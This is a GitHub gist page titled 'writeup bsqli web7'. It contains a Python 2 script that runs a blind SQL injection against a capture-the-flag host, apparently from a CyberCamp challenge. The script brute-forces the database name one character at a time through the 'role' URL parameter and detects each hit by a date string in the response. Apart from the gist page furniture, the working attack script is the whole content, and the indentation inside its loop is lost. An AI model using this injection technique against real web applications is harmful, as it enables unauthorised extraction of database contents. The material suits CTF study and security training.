Skip to content

Instantly share code, notes, and snippets.

@tunelko

tunelko/writeup bsqli web7

Created November 5, 2016 11:21
Show Gist options
  • Star 0 You must be signed in to star a gist
  • Fork 0 You must be signed in to fork a gist
  • Save tunelko/a52ee0c5d0fb179625eee823b48d0be8 to your computer and use it in GitHub Desktop.
Save tunelko/a52ee0c5d0fb179625eee823b48d0be8 to your computer and use it in GitHub Desktop.
Download ZIP
Raw
writeup bsqli web7
#!/usr/bin/env python
import requests
import urllib
import base64
import string
import sys
url='https://webvulnerable07.cybercamp.es:8507/index.php'
alpha=string.uppercase+string.lowercase
digits=string.digits
testchars=alpha+str(digits)+'{'+'}'
dbstring=''
pos=0
cookies={}
for i in range(14):
pos = i + 1;
for tried in testchars:
urlvuln= url + "?role=admin' AND (SELECT SUBSTR((SELECT current_database()),1,%s))='%s" % (pos, dbstring+tried)
r = requests.get(urlvuln,cookies=cookies)
print urlvuln
if '2016-06-12' in r.content:
print 'FOUND' + tried
dbstring += tried
print dbstring
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment